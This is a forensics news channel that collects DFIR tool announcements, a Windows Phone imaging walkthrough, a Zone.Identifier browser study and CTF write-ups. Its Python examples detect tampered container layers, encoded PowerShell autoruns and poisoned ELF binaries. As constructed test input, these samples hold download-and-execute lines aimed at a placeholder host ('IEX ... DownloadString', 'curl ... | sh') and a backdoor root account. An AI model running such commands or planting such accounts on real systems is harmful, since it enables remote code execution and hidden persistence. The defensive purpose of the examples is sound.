Channel: forensic tools – Cyber Forensicator

Autopsy 4.7.0 and The Sleuth Kit 4.6.1 have been released

New versions of the most popular open source DFIR tools, Autopsy and The Sleuth Kit (TSK), have been released. Here are the lists of new features:

Autopsy

  • A graph visualization was added to the Communications tool to make it easier to find messages and relationships.
  • A new “Application” content viewer (lower right) that will contain file-type specific viewers (to reduce number of tabs).
  • New viewer for SQLite databases (in Application content viewer)
  • New viewer for binary PLists (in Application content viewer)
  • L01 files can be imported as data sources.
  • Ingest filters can now use date range conditions for triage.
  • Passwords to open password protected archive files can be entered (by right clicking on the file).
  • Reports (e.g., RegRipper output) generated by ingest modules are now indexed for keyword search.
  • PhotoRec carving module can be configured to keep corrupted files.
  • Sector size can be specified for local drives and images when E01 is wrong or it is a raw image.
  • New data source processor in Experimental module that runs Volatility, adds the outputs as files, and parses the reports to provide INTERESTING_FILE artifacts.
  • Assorted small enhancements are included.

The Sleuth Kit

  • Lots of bounds checking fixes from Google’s fuzzing tests. Thanks Google.
  • Cleanup and fixes from uckelman-sf and others
  • PostgreSQL, libvhdi, & libvmdk are supported for Linux / OS X
  • Fixed display of NTFS GUID in istat – report from Eric Zimmerman.
  • NTFS istat shows details about all FILE_NAME attributes, not just the first. report from Eric Zimmerman.
  • Reports can be URLs
  • Reports are Content
  • Added APIs for graph view of communications
  • JNI library is extracted to name with user name in it to avoid conflicts
  • Database version upgraded to 8.0 because Reports are now Content

 


Docker Explorer – a Tool to Help Forensicate Offline Docker Acquisitions

This project helps a forensic analyst explore offline Docker filesystems. Docker uses layered backend filesystems such as AuFS or OverlayFS. Each layer is actually stored on the host's filesystem as a set of folders, and a number of JSON files are used by Docker to know which folder belongs to which layer and container.
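To make the layering concrete, here is an added example (not code from docker-explorer) that merges layers offline the way a union filesystem would. It uses the AuFS-style convention that Docker image tarballs use: a `.wh.<name>` file in an upper layer hides `<name>` from the layers below, and a `.wh..wh..opq` marker makes its directory opaque. The layers are constructed in memory rather than read from `/var/lib/docker`; the "diff" view at the end is what you would compare against the image's original layer to spot tampering in a container.

```python
"""Offline reconstruction of a layered Docker filesystem view.

Added example, not code from docker-explorer. It models the AuFS-style
layer convention that Docker image tarballs use: every layer is a directory
tree; a file named .wh.<name> in an upper layer hides <name> from the layers
below it; a .wh..wh..opq marker makes its directory opaque, so nothing from
lower layers shows through. Layers are constructed in memory here instead of
being read from /var/lib/docker. (overlay2 on disk expresses whiteouts as
character devices 0/0 and opaque directories via the trusted.overlay.opaque
xattr; the merge rules are the same.)
"""
from typing import Dict, List, Optional

WHITEOUT_PREFIX = ".wh."
OPAQUE_MARKER = ".wh..wh..opq"

Layer = Dict[str, Optional[bytes]]  # path -> contents; None for marker files


def merge_layers(layers: List[Layer]) -> Dict[str, bytes]:
    """Return the merged view of ``layers`` ordered from lowest to highest.

    Paths use forward slashes and no leading slash.
    """
    merged: Dict[str, bytes] = {}
    for layer in layers:
        # Opaque markers first: everything below that directory disappears.
        for path in layer:
            if path.rsplit("/", 1)[-1] == OPAQUE_MARKER:
                prefix = path[: len(path) - len(OPAQUE_MARKER)]  # keeps the "/"
                for existing in [p for p in merged if p.startswith(prefix)]:
                    del merged[existing]
        for path, content in layer.items():
            name = path.rsplit("/", 1)[-1]
            if name == OPAQUE_MARKER:
                continue
            if name.startswith(WHITEOUT_PREFIX):
                target = path[: len(path) - len(name)] + name[len(WHITEOUT_PREFIX):]
                # A whiteout hides the file, or the whole tree if it names a directory.
                for existing in [p for p in merged
                                 if p == target or p.startswith(target + "/")]:
                    del merged[existing]
                continue
            merged[path] = content if content is not None else b""
    return merged


def diff_against_base(base: Layer, merged: Dict[str, bytes]) -> Dict[str, str]:
    """Classify each path as added / removed / modified relative to ``base``."""
    report: Dict[str, str] = {}
    for path in set(base) | set(merged):
        if path not in base:
            report[path] = "added"
        elif path not in merged:
            report[path] = "removed"
        elif base[path] != merged[path]:
            report[path] = "modified"
    return report


# Constructed sample: an image layer and a container layer that tampers with it.
BASE_LAYER: Layer = {
    "etc/passwd": b"root:x:0:0:root:/root:/bin/sh\n",
    "tmp/secret.key": b"k3y",
    "app/config/old.conf": b"debug=0\n",
    "bin/sh": b"\x7fELF...",
}
UPPER_LAYER: Layer = {
    "etc/passwd": b"root:x:0:0:root:/root:/bin/sh\nbackdoor:x:0:0::/:/bin/sh\n",
    "tmp/.wh.secret.key": None,        # whiteout: deletes tmp/secret.key
    "app/config/.wh..wh..opq": None,   # opaque: hides everything under app/config/
    "app/config/new.conf": b"debug=1\n",
}

if __name__ == "__main__":
    view = merge_layers([BASE_LAYER, UPPER_LAYER])
    for path, change in sorted(diff_against_base(BASE_LAYER, view).items()):
        print(f"{change:9s} {path}")
```

Running it lists `etc/passwd` as modified, `tmp/secret.key` and `app/config/old.conf` as removed, and `app/config/new.conf` as added, which is exactly the kind of delta an analyst wants from an offline container acquisition.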

2018 Volatility Analysis Contest

The Volatility Foundation has announced another contest, the Volatility Analysis Contest. All you need to do is choose a sophisticated malware sample, attack framework, or challenging security incident scenario and write an analysis report detailing how Volatility can be used to find the relevant artifacts of that activity in memory.

Unlocking the DFIR Door

Brett Shavers has posted a list of tips on getting hired in DFIR.

Darwin-Collector – collect key files for macOS investigations

Darwin-Collector.sh is a script designed to be run against a mounted image, a live system, or a device in target disk mode. The script automates the collection of key files for macOS investigations. You can learn more about the tool and download it here.

Simple Linux Forensics

Craig Rowland from Sandfly Security goes over simple tactics and techniques you can use to assess a Linux host for signs of compromise.

Windows Phone Physical Imaging Without JTAG and Chip-off

Windows Phones are not frequent guests in our digital forensics lab, especially now that Microsoft has stopped developing the platform. Nevertheless, we sometimes have to forensicate such devices, so it is important to have fast and simple data extraction methods. For a long time the only physical extraction options were JTAG and chip-off, but thanks to security researchers, in this case Heathcliff, there is now a tool that lets digital forensics professionals create physical dumps of a number of WP models: WPinternals.

The tool unlocks the bootloader and gains root access to the phone. It is important to note that this technique works even on locked phones. For example, we had a locked phone with more than 1 000 000 seconds to wait until the next unlock attempt, but we successfully created a physical image with WPinternals and decoded it with Oxygen Forensic Detective.

Once you connect the phone to your workstation, the tool detects its model automatically. First, you need to download two or more files the tool needs to unlock the phone: an FFU (Windows Full Flash Update) file and the emergency files for the model you are working with. WPinternals supports the following models: Lumia 520, 521, 525, 620, 625, 720, 820, 920, 925, 928, 1020 and 1320; and the following operating system versions: 8.10.12393.890, 8.10.12397.895, 8.10.14219.341, 8.10.14226.359, 8.10.14234.375, 8.10.15116.125, 8.10.15148.160, 10.0.10512.1000, 10.0.10536.1004, 10.0.10549.4, 10.0.10581.0, 10.0.10586.11, 10.0.10586.36.

Figure 1. Downloading FFU and emergency files

If the downloaded FFU contains an unsupported OS version, the tool downloads another FFU and extracts the files it needs from that one.

Figure 2. Using another FFU because of unsupported OS version

During the unlocking process Windows Phone Internals scans for a flashing profile; the phone may appear to be in a reboot loop, but this is expected behavior:

Figure 3. Scanning for flashing profile

Once the profile is found, WPinternals flashes the unlocked bootloader:

Figure 4. Flashing unlocked bootloader

The phone should now be in Mass Storage Mode:

Figure 5. Mass Storage Mode

That's what we need! It's time to image it. You can use any of the tools you use for HDD imaging, for example FTK Imager:

Figure 6. Imaging a Windows Phone with FTK Imager

It is that easy: we now have a full physical image of the phone's internal memory:

Figure 7. Windows Phone image partition structure

It is now ready to be processed with the mobile forensic tool of your choice, or it can be examined manually. There are a lot of partitions, but the most interesting ones from a forensic perspective are MainOS and Data.

Happy forensicating!

About the authors

Oleg Skulkin, GCFA, MCFE, ACE, is a DFIR enthusional (enthusiast + professional), Windows Forensics Cookbook and Practical Mobile Forensics co-author.

Igor Mikhaylov, MCFE, EnCE, ACE, OSFCE, is a digital forensic examiner with more than 20 years of experience and Mobile Forensics Cookbook author.

DFIR Summit & Training 2018

SANS Institute has published the presentations from DFIR Summit & Training 2018. You can find all of them here.


RDP Logs and Incident Response

Malicious PowerShell in the Registry: Persistence

Mari DeGrazia continues her series of blog posts on detecting and analyzing malicious PowerShell scripts. This time you'll learn how to find such scripts in the Windows registry with Registry Explorer and RegRipper.
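Once you have the Run-key values out of a hive, the encoded ones still have to be decoded before you can read them. The following is an added example, not code from Mari's post, Registry Explorer or RegRipper: it scans a constructed dictionary standing in for a Run key's values, finds `-EncodedCommand` (and its `-e`/`-ec`/`-enc` abbreviations), reverses PowerShell's base64-of-UTF-16LE encoding, and pulls out any DLL names the script references.

```python
"""Find and decode PowerShell -EncodedCommand payloads in autorun values.

Added example, not from Mari DeGrazia's post, Registry Explorer or RegRipper.
Input is a constructed dict standing in for the values of a Run key (on an
image these would come from a parsed NTUSER.DAT or SOFTWARE hive).
powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec,
-enc, ...) and expects base64 of the script text encoded as UTF-16LE.
"""
import base64
import binascii
import re
from typing import Dict, List, Optional

# -e / -ec / -en / -enc / -encodedcommand followed by a base64 blob.
ENCODED_FLAG = re.compile(
    r"-e(?:c|n(?:c(?:odedcommand)?)?)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE
)
DLL_NAME = re.compile(r"\b[\w.-]+\.dll\b", re.IGNORECASE)


def decode_encoded_command(b64: str) -> Optional[str]:
    """Reverse -EncodedCommand: base64 -> UTF-16LE text. None if malformed."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def encode_command(script: str) -> str:
    """The inverse, used here only to build the constructed sample."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def find_encoded_commands(values: Dict[str, str]) -> List[dict]:
    """Return one record per value that carries an encoded PowerShell command."""
    hits: List[dict] = []
    for name, data in values.items():
        match = ENCODED_FLAG.search(data)
        if not match:
            continue
        script = decode_encoded_command(match.group(1))
        dlls = sorted({d.lower() for d in DLL_NAME.findall(script)}) if script else []
        hits.append({"value_name": name, "raw": data, "script": script, "dlls": dlls})
    return hits


# Constructed sample values; example.invalid is a reserved, non-resolving domain.
SAMPLE_SCRIPT = (
    "$k = 'kernel32.dll'; "
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')"
)
SAMPLE_RUN_VALUES = {
    "OneDrive": r"C:\Users\max\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background",
    "Updater": "powershell.exe -NoP -W Hidden -enc " + encode_command(SAMPLE_SCRIPT),
}

if __name__ == "__main__":
    for hit in find_encoded_commands(SAMPLE_RUN_VALUES):
        print(f"[{hit['value_name']}] dlls={hit['dlls']}")
        print("   ", hit["script"])
```

The same decoder applies to the base64 strings you meet in Windows PowerShell.evtx and in ConsoleHost_history.txt; a value that matches the flag but fails to decode is still worth a look, because attackers sometimes wrap a second layer of compression or encoding inside.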

Linux Binary Poisoning Detection

In this post the folks at Sandfly Security describe the process of detecting poisoned Linux binaries. You will learn how binary poisoning works and how to detect it both manually and automatically.
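One simple automatic check, shown here as an added example rather than Sandfly's own tooling: a binary that has had a payload appended after its real content is larger than its ELF headers account for. The script parses the ELF64 header and section headers with `struct`, computes the highest file offset they describe, and reports anything beyond it. A minimal ELF64 image is constructed in memory for the demonstration; `scan_file()` runs the same check on a real file.

```python
"""Flag ELF64 binaries that carry data past what their headers describe.

Added example, not Sandfly's code. The heuristic: take the furthest offset
referenced by the program-header table, the section-header table and any
section that occupies file space, and compare it with the file size. A
positive remainder means something was appended after the binary was built.
"""
import struct

ELF_MAGIC = b"\x7fELF"
EHDR = struct.Struct("<16sHHIQQQIHHHHHH")  # ELF64 header, little-endian, 64 bytes
SHDR = struct.Struct("<IIQQQQIIQQ")        # ELF64 section header, 64 bytes
SHT_NOBITS = 8                             # .bss-style sections take no file space


def described_end(data: bytes) -> int:
    """Return the highest file offset the ELF headers account for."""
    if len(data) < EHDR.size or data[:4] != ELF_MAGIC:
        raise ValueError("not an ELF file")
    if data[4] != 2:  # EI_CLASS: 1 = 32-bit, 2 = 64-bit
        raise ValueError("only ELF64 is handled in this example")
    fields = EHDR.unpack_from(data, 0)
    e_phoff, e_shoff = fields[5], fields[6]
    e_phentsize, e_phnum, e_shentsize, e_shnum = fields[9:13]
    end = max(EHDR.size, e_phoff + e_phentsize * e_phnum,
              e_shoff + e_shentsize * e_shnum)
    if e_shnum and e_shoff + e_shentsize * e_shnum > len(data):
        raise ValueError("section header table runs past end of file")
    for i in range(e_shnum):
        sh = SHDR.unpack_from(data, e_shoff + i * e_shentsize)
        sh_type, sh_offset, sh_size = sh[1], sh[4], sh[5]
        if sh_type != SHT_NOBITS:
            end = max(end, sh_offset + sh_size)
    return end


def trailing_bytes(data: bytes) -> int:
    """Bytes present after everything the headers describe (0 for a clean file)."""
    return len(data) - described_end(data)


def scan_file(path: str) -> int:
    with open(path, "rb") as fh:
        return trailing_bytes(fh.read())


def build_minimal_elf64(text: bytes = b"\x90" * 16) -> bytes:
    """Construct a tiny (non-runnable) ELF64 image: header, a null section
    header plus a .text header, then the .text bytes. Used as sample input."""
    ident = ELF_MAGIC + bytes([2, 1, 1, 0]) + b"\x00" * 8  # ELF64, LSB, v1, SYSV ABI
    shoff = EHDR.size
    text_off = shoff + 2 * SHDR.size
    header = EHDR.pack(ident, 2, 0x3E, 1, 0x401000, 0, shoff, 0,
                       EHDR.size, 0, 0, SHDR.size, 2, 0)
    null_sh = SHDR.pack(0, 0, 0, 0, 0, 0, 0, 0, 0, 0)
    text_sh = SHDR.pack(1, 1, 0x6, 0x401000, text_off, len(text), 0, 0, 16, 0)
    return header + null_sh + text_sh + text


if __name__ == "__main__":
    clean = build_minimal_elf64()
    poisoned = clean + b"#!/bin/sh\ncurl example.invalid | sh\n"  # constructed
    print("clean   :", trailing_bytes(clean), "trailing bytes")
    print("poisoned:", trailing_bytes(poisoned), "trailing bytes")
```

Treat a hit as a lead, not a verdict: self-extracting archives and AppImage-style bundles legitimately carry data after the ELF. The check also says nothing about in-place patching of code, so pair it with package-manager verification (`rpm -V`, `debsums`) or a hash comparison against a known-good copy.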

Epochalypse: Utility to Convert Epoch Timestamps

The Epochalypse utility by Pasquale Stirparo has been updated and now supports APFS timestamps. You can download the Python script from Pasquale's GitHub.
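The idea behind such a tool is simple enough to show in a few lines. This is an added example in the same spirit, not Epochalypse's code: it converts one raw integer under the epoch conventions most often met in DFIR work (Unix seconds and milliseconds, APFS nanoseconds, Windows FILETIME, Chrome/WebKit microseconds, Apple Cocoa seconds) and keeps only the interpretations that land in a plausible date range. The sample values are constructed; all of them encode 2018-01-01 00:00:00 UTC.

```python
"""Interpret a raw timestamp under several epoch conventions.

Added example in the spirit of Epochalypse; it is not that tool's code.
Results are timezone-aware UTC datetimes. Sub-microsecond precision (APFS
and FILETIME) is truncated because datetime only carries microseconds.
"""
from datetime import datetime, timedelta, timezone
from typing import Callable, Dict

UNIX_EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)
WINDOWS_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)  # FILETIME and WebKit/Chrome
COCOA_EPOCH = datetime(2001, 1, 1, tzinfo=timezone.utc)    # Apple Cocoa / Core Data


def from_unix_seconds(v: int) -> datetime:
    return UNIX_EPOCH + timedelta(seconds=v)


def from_unix_millis(v: int) -> datetime:
    return UNIX_EPOCH + timedelta(milliseconds=v)


def from_apfs_nanoseconds(v: int) -> datetime:
    # APFS stores nanoseconds since the Unix epoch; integer math avoids float drift.
    return UNIX_EPOCH + timedelta(seconds=v // 1_000_000_000,
                                  microseconds=(v % 1_000_000_000) // 1000)


def from_windows_filetime(v: int) -> datetime:
    # FILETIME: 100-nanosecond intervals since 1601-01-01.
    return WINDOWS_EPOCH + timedelta(microseconds=v // 10)


def from_webkit_microseconds(v: int) -> datetime:
    # Chrome/WebKit history databases: microseconds since 1601-01-01.
    return WINDOWS_EPOCH + timedelta(microseconds=v)


def from_cocoa_seconds(v: float) -> datetime:
    return COCOA_EPOCH + timedelta(seconds=v)


CONVERTERS: Dict[str, Callable[[int], datetime]] = {
    "unix_seconds": from_unix_seconds,
    "unix_millis": from_unix_millis,
    "apfs_nanoseconds": from_apfs_nanoseconds,
    "windows_filetime": from_windows_filetime,
    "webkit_microseconds": from_webkit_microseconds,
    "cocoa_seconds": from_cocoa_seconds,
}

# Assumed plausibility window; widen it for older evidence.
PLAUSIBLE = (datetime(1995, 1, 1, tzinfo=timezone.utc),
             datetime(2040, 1, 1, tzinfo=timezone.utc))


def candidates(v: int, window=PLAUSIBLE) -> Dict[str, datetime]:
    """Every interpretation of ``v`` that falls inside ``window``."""
    out: Dict[str, datetime] = {}
    for name, convert in CONVERTERS.items():
        try:
            dt = convert(v)
        except (OverflowError, ValueError):  # value too large for this epoch
            continue
        if window[0] <= dt <= window[1]:
            out[name] = dt
    return out


# Constructed samples, all representing 2018-01-01 00:00:00 UTC.
SAMPLES = {
    "unix_seconds": 1514764800,
    "unix_millis": 1514764800000,
    "apfs_nanoseconds": 1514764800000000000,
    "windows_filetime": 131592384000000000,
    "webkit_microseconds": 13159238400000000,
    "cocoa_seconds": 536457600,
}

if __name__ == "__main__":
    for fmt, raw in SAMPLES.items():
        print(f"{raw:>22} ->", {k: v.isoformat() for k, v in candidates(raw).items()})
```

A raw value usually has only one plausible reading, which is why the window filter does most of the work; when two survive (Unix milliseconds versus Cocoa seconds is a classic), the artifact's source decides.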

Where Did It Come From: Forensic Analysis of Zone.Identifier

As you may know, David Cowen runs Sunday Funday challenges, and one of the most recent was the Zone.Identifier challenge. I didn't win, but I decided to post my submission as it contains some additional information. So, here we go:

Windows XP SP2 introduced the Zone.Identifier alternate data stream (ADS), which is created alongside a file downloaded from the Internet or an intranet. Zone.Identifier is written by applications when the user saves a file to the local file system from a different security zone. There are 5 commonly encountered zone identifiers:

0 – Local Machine Zone, the most trusted zone for content that exists on the local computer;

1 – Local Intranet Zone, for content located on an organization’s intranet;

2 – Trusted Sites Zone, for content located on Web sites that are considered more reputable or trustworthy than other sites on the Internet.

3 – Internet Zone, for Web sites on the Internet that do not belong to another zone;

4 – Restricted Sites Zone, for Web sites that contain potentially-unsafe content.

I started my testing with 8 web browsers: Google Chrome, Microsoft Edge, Mozilla Firefox, Internet Explorer, Opera, Tor, UC Browser and Vivaldi. I downloaded the same file to the same folder and used AlternateStreamView to look at the Zone.Identifier streams:

A few important facts: Internet Explorer did not create a stream, and the stream size differs depending on the browser used.

OK, let's look at what exactly is contained within them.

Google Chrome:

[ZoneTransfer]

ZoneId=3

ReferrerUrl=http://cyberforensicator.com/

HostUrl=http://cyberforensicator.com/wp-content/uploads/2017/08/CF_LOGO_NEW.png

Not bad, huh? We have not only the zone, but also referrer and host URLs. Awesome!

Microsoft Edge:

[ZoneTransfer]

LastWriterPackageFamilyName=Microsoft.MicrosoftEdge_8wekyb3d8bbwe

ZoneId=3

Again, we have the zone, of course, but also the browser's package family name. No website or URL, unfortunately.

Firefox:

[ZoneTransfer]

ZoneId=3

Unfortunately, only the zone.

Opera:

[ZoneTransfer]

ZoneId=3

ReferrerUrl=http://cyberforensicator.com/

HostUrl=http://cyberforensicator.com/wp-content/uploads/2017/08/CF_LOGO_NEW.png

As far as I remember, it’s based on Chrome, so we have the same here. Not bad.

Tor:

[ZoneTransfer]

ZoneId=3

Tor is based on Firefox, so we have only the zone.

UC Browser:

[ZoneTransfer]

ZoneId=3

ReferrerUrl=http://cyberforensicator.com/

HostUrl=http://cyberforensicator.com/wp-content/uploads/2017/08/CF_LOGO_NEW.png

Probably this browser is also Chrome-based, a lot of good info.

Vivaldi:

[ZoneTransfer]

ZoneId=3

ReferrerUrl=http://cyberforensicator.com/

HostUrl=http://cyberforensicator.com/wp-content/uploads/2017/08/CF_LOGO_NEW.png

Same here, a lot of useful info.

So, Zone.Identifier may contain different sets of data, depending on the browser used to download the file.
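Because the stream is plain INI text, it is easy to triage in bulk. Here is an added example (not part of the challenge submission or of AlternateStreamView) that parses a `[ZoneTransfer]` block, maps the ZoneId to its zone name, and extracts the origin host from HostUrl when one is present. The sample streams are the ones shown above, embedded as constructed inputs so the script runs anywhere; on a live NTFS volume `read_stream()` opens the ADS directly via the `file:Zone.Identifier` path syntax.

```python
"""Parse Zone.Identifier alternate data streams and summarize their contents.

Added example, not from the challenge or from AlternateStreamView. The
sample streams are the ones observed in this post, embedded as constructed
inputs; read_stream() reads the real ADS on Windows/NTFS.
"""
import configparser
from typing import Dict, Optional
from urllib.parse import urlsplit

ZONE_NAMES = {
    0: "Local Machine",
    1: "Local Intranet",
    2: "Trusted Sites",
    3: "Internet",
    4: "Restricted Sites",
}


def parse_zone_identifier(text: str) -> Dict[str, str]:
    """Return the key/value pairs of the [ZoneTransfer] section, case preserved."""
    cp = configparser.ConfigParser(interpolation=None, delimiters=("=",),
                                   empty_lines_in_values=False)
    cp.optionxform = str  # keep ZoneId / HostUrl capitalization as written
    cp.read_string(text)
    if not cp.has_section("ZoneTransfer"):
        raise ValueError("no [ZoneTransfer] section")
    return dict(cp.items("ZoneTransfer"))


def summarize(text: str) -> Dict[str, Optional[str]]:
    """Condense a stream into the facts an examiner reports."""
    fields = parse_zone_identifier(text)
    zone_id = int(fields.get("ZoneId", "-1"))
    host = fields.get("HostUrl")
    if host == "about:internet":
        origin = "about:internet (no URL recorded; seen with torrent clients)"
    elif host:
        origin = urlsplit(host).netloc
    else:
        origin = None
    return {
        "zone": ZONE_NAMES.get(zone_id, f"unknown ({zone_id})"),
        "origin_host": origin,
        "host_url": host,
        "referrer_url": fields.get("ReferrerUrl"),
        "writer": fields.get("LastWriterPackageFamilyName"),
    }


def read_stream(path: str) -> str:
    """Read the ADS of a file on NTFS (Windows only; not used by the samples)."""
    with open(path + ":Zone.Identifier", "r", encoding="utf-8", errors="replace") as fh:
        return fh.read()


# Constructed samples reproducing the streams shown in this post.
CHROME_SAMPLE = """[ZoneTransfer]
ZoneId=3
ReferrerUrl=http://cyberforensicator.com/
HostUrl=http://cyberforensicator.com/wp-content/uploads/2017/08/CF_LOGO_NEW.png
"""
EDGE_SAMPLE = """[ZoneTransfer]
LastWriterPackageFamilyName=Microsoft.MicrosoftEdge_8wekyb3d8bbwe
ZoneId=3
"""
TORRENT_SAMPLE = "[ZoneTransfer]\r\nZoneId=3\r\nHostUrl=about:internet\r\n"

if __name__ == "__main__":
    for label, sample in (("chrome", CHROME_SAMPLE), ("edge", EDGE_SAMPLE),
                          ("torrent", TORRENT_SAMPLE)):
        print(label, summarize(sample))
```

Note that the parser deliberately uses only `=` as a delimiter: with configparser's default delimiters the `:` inside `about:internet` or a URL would be misread as a key separator.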

Also, I decided to test what happens to files downloaded from mail clients. Let’s look at Microsoft Outlook 2016:

[ZoneTransfer]

ZoneId=3

Zone identifier only; anyway, we know it was downloaded and not created on the local computer.

I thought it wasn’t enough and tested it with Mozilla Thunderbird too. I got the same:

[ZoneTransfer]

ZoneId=3

Not enough, let’s look at Windows Mail:

[ZoneTransfer]

ZoneId=3

So, same here.

I also looked at Windows cloud applications: Google Drive, Mega Sync, pCloud and Box, but didn't find a Zone.Identifier ADS on any files. Of course, such apps are usually used for uploading files, but some files are downloaded from the cloud to the local computer by these apps. What is more, some files may be uploaded from different devices and downloaded to the local computer during the sync process.

I decided not to stop, and tested the μTorrent app; it creates Zone.Identifier too:

[ZoneTransfer]

ZoneId=3

HostUrl=about:internet

I downloaded two different files, and both have the same HostUrl, so it may be used for detecting files downloaded via torrents, at least via μTorrent.

I continued my testing with a few more torrent clients:

BitTorrent creates the same Zone.Identifier:

[ZoneTransfer]

ZoneId=3

HostUrl=about:internet

As for the 2 other clients, Transmission and Vuze, they do not add Zone.Identifier.

I also played a bit with TeamViewer, both using the file transfer feature and copy+paste: no Zone.Identifier for transferred files. Same with the FlashGet download manager: no Zone.Identifier for downloaded files.

Then I decided to test a few chat apps, starting with Telegram, and got the following:

[ZoneTransfer]

ZoneId=3

So Telegram Desktop adds Zone.Identifier too.

Finally I decided to test another popular messenger – Skype:

[ZoneTransfer]

ZoneId=3

As you can see, there are lots of applications capable of creating a Zone.Identifier ADS, so this topic needs much more research and testing. Also, don't forget to check Phil Moore's winning submission.

Happy Forensicating!

Oleg Skulkin, GCFA, MCFE, ACE, is a DFIR enthusional (enthusiast + professional), Windows Forensics Cookbook and Practical Mobile Forensics co-author.

Smartphone Acquisition: Adapt, Adjust and Get Smarter!

Heather Mahalik has posted a list of recommendations on the forensic acquisition of iOS and Android-based smartphones. If you haven't checked it yet, it's high time to do so!

Magnet User Summit CTF: Anti-Forensics

Yesterday Troy Schnack and Kevin Pagano suggested on Twitter that it would be good to write up how I solved the Magnet User Summit CTF. I thought it was a good idea and decided to do it with my friend Igor Mikhaylov. This will be a series of posts, and the first part is dedicated to anti-forensics.

Wiping App

This is a really easy question, especially if you are using Magnet AXIOM. Just look at the Encryption / Anti-forensics Tools tab, and you'll find that it's Eraser:

User that Wiped

We started with UserAssist, of course. What did we see? Eraser 6.2.0.2982.exe was downloaded and run by itsupport, and... that was the flag:

Data Written

This is easy too: SRUDB.dat. You can also find the answer to the previous question here, as it contains the user SID too. But we are interested in the amount of data written, and it's 27394048:

Browser to Download Wiper

This is a bit tricky. You must know that both Internet Explorer and Edge store data in the same ESE database, WebCacheV01.dat. Magnet AXIOM shows it as Internet Explorer 10-11 Main History, but the flag isn't Internet Explorer, it's Edge:

Wiped File Names

This is one of the hardest questions. The answer is hidden in the $UsnJrnl. First of all, you should extract the $UsnJrnl:$J stream:

Next, you should parse it. I used UsnJrnl2Csv, and Timeline Explorer to analyze the CSV output. According to the prefetch files, eraser.exe was last run on 26.04.2018 at 18:41:07. Let's look at suspicious activity after that:

Looks strange, huh? So, applypatch-msg.sample is the first file name we are looking for. If you scroll down, you’ll find other file names, more than 5 actually. So the flag may be applypatch-msg.sample, commit-msg.sample, fsmonitor-watchman.sample, post-update.sample, pre-applypatch.sample.

That’s all for today!

Happy forensicating!

About the authors

Oleg Skulkin, GCFA, MCFE, ACE, is a DFIR enthusional (enthusiast + professional), Windows Forensics Cookbook and Practical Mobile Forensics co-author.

Igor Mikhaylov, MCFE, EnCE, ACE, OSFCE, is a digital forensic examiner with more than 20 years of experience and Mobile Forensics Cookbook author.


Magnet User Summit CTF: Misc

We are continuing our write-up. The second part walks you through the solution of the second set of CTF problems: Misc.

Timezone

Again, a very easy task, but it's only the beginning. You can find the flag in the Timezone Information section of AXIOM, or via manual analysis of the TimeZoneInformation registry key:

As you can see, the flag is Mountain.

VSN – C

Another easy task: finding the volume serial number. There are lots of tools capable of providing this info, but we will use AXIOM again. The flag is 6C19-1B65:

YouTube Search

Not difficult at all either. It's time to analyze browsing history. A good idea is to filter the data, as we need 3/28/2018. Once it's filtered, you can search for "youtube". Bingo! We got the flag: simpsons max power:

Sleuthkit + PowerShell

The system we are analyzing has great logging capabilities, so you can find PowerShell transcripts in the Documents folder. But that's not all. If you search for "SRUDB.dat", you'll quickly find ConsoleHost_history.txt, which contains the flag: $inode = ifind -n /Windows/System32/sru/SRUDB.dat \\.\C: ; icat \\.\C: $inode > SRUDB.dat:

Administrator Logon Count

Extremely easy with AXIOM: look at the User Accounts section. The flag is 14:

Install Q

It's time to look at the Installed Programs list; it's very easy to find this flag: 2018-04-11:

File Sequence Number

This was the time to test a new tool by Eric Zimmerman, MFTEcmd. First you should export the $MFT file and parse it with the tool. Next, search for "python.exe". The flag is 1:

Filename Lookup

You can use the same CSV and search for "86280". The flag is $UsnJrnl:

File Timestamp

Again, the same CSV. Search for "CMD.EXE-89305D47.pf" and look at the LastAccess0x10 column. So the flag is 2018-04-26 15:48:40:

Who Installed Atom?

Let’s look at Installed Programs list again:

So, now we know it was maxpowers who installed it. Let's get the SID. Look at User Accounts:

As you can see, the flag is S-1-5-21-2801897208-1878083585-4182000528-1002.

Deletion in LogFile

AXIOM is capable of parsing $LogFile contents, so you can find the flag in the $LogFile Analysis section:

As you can see, the deleted file's name is 7z.dll, and this is the flag.

That’s all for today!

Happy forensicating!

About the authors

Oleg Skulkin, GCFA, MCFE, ACE, is a DFIR enthusional (enthusiast + professional), Windows Forensics Cookbook and Practical Mobile Forensics co-author.

Igor Mikhaylov, MCFE, EnCE, ACE, OSFCE, is a digital forensic examiner with more than 20 years of experience and Mobile Forensics Cookbook author.

Magnet User Summit CTF: Intrusion

So, we decided to finish our write-up today. The fourth part is the most interesting one: Intrusion! Again, no AXIOM this time, only free and open source tools!

Method of Attack

What was the method of attack the threat actor used?

So, we started with Windows Event Log analysis, and very soon found our favorite base64-encoded string in Windows PowerShell.evtx:

The event took place on 04/26/2018 16:01:39 (UTC). We decided to look for documents opened around that time, as weaponized documents are a common vector in such attacks. Soon we found an LNK file indicating that EpochConversionExample.xls was opened on 04/26/2018 16:01:38. The document is located under C:\Users\maxpowers\Desktop\EpochConversionExample\. Let's look inside:

Surprise! OK, we have found the weaponized document. It's time to find its origin. It's inside the EpochConversionExample folder on the Desktop. You can also find an archive with the same name there, and... a Zone.Identifier ADS:

[ZoneTransfer]

ZoneId=3

So, it was downloaded from the Internet. Where should we start? Emails or browsing history? Emails seem to be the better choice. Let's look at mpowers@magnetic4nsics.com.ost located under C:\Users\maxpowers\AppData\Local\Microsoft\Outlook\. You can use SysTools OST Viewer to browse its contents. Let's search for the attachment of interest. Here it is:

So, our victim got an archive with the weaponized document via email; the flag is phishing.

Attack Email Address

What was the email address associated with the attacker?

As you can see on the last screenshot, the email is thanks2u2andu@gmail.com.

Malicious Document

What is the file name of the malicious document the attacker used?

Again, we already know that it’s EpochConversionExample.xls.

Base64 Payload

What was the BASE64 payload that gave the attacker a shell? [BASE64 value]

As you have seen in the logs, the payload is:

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

Decoded Imports

What two DLLs were imported in the base64 payload? [Comma separated with extensions]

Let’s look at the same log record again:

As you can see, the flag is kernel32.dll, msvcrt.dll.

First Login

